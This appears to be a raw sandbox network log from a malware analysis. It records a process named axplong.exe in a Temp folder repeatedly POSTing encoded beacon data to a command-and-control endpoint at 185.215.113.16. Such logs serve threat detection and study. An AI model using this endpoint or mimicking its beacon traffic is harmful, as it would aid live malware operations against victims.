Sep 27, 2024 00:21:26.037543058 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:26.771418095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49813	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:26.898294926 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:27.589864016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:27.595889091 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:27.817538977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49814	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:27.938584089 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:28.652015924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:28.658968925 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:28.884406090 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49815	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:29.001600981 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:29.720103025 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49816	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:29.729978085 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:30.425369978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49817	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:30.562225103 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:31.245839119 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49818	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:31.258805037 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:32.014235973 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49819	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:32.124872923 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:32.913073063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49820	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:32.923227072 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:33.660505056 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49821	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:33.781671047 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:34.490014076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49822	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:34.500309944 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:35.212430000 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49823	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:35.656918049 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:36.362907887 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49824	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:36.377777100 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:37.110224009 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49825	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:37.234158993 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:37.952260017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49826	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:37.978038073 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:38.694607019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49827	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:38.818686008 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49828	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:39.270950079 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:40.157294035 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49829	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:40.282069921 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:40.977560997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49830	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:40.987936020 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:41.694217920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49831	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:41.812446117 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:42.585949898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49832	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:42.602546930 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:43.300069094 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49833	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:43.420763969 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
